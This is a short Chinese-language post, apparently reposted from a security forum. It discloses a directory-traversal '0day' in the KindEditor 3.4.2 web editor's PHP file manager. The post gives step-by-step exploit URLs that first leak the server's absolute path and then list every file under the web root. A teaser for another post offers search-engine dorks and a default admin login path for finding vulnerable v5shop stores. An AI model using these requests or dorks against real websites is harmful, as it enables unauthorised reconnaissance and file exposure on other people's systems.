作者:子↘仪
版本:3.4.2
介绍:KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,KindEditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
文章来源于lcx.cc:【漏洞公布】Kindeditor遍历目录0DAY
相关推荐: 【Oday】v5shop网上商城系统通杀oday
v5shop 网上商城系统通杀oday 关键字:services.aspxid= inurl:scoreindex.aspx 官网测试已被和谐 ! 漏洞危害:高危 官网网站:www.v5shop.com.cn 默认后台地址:weblogin/Login.asp…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论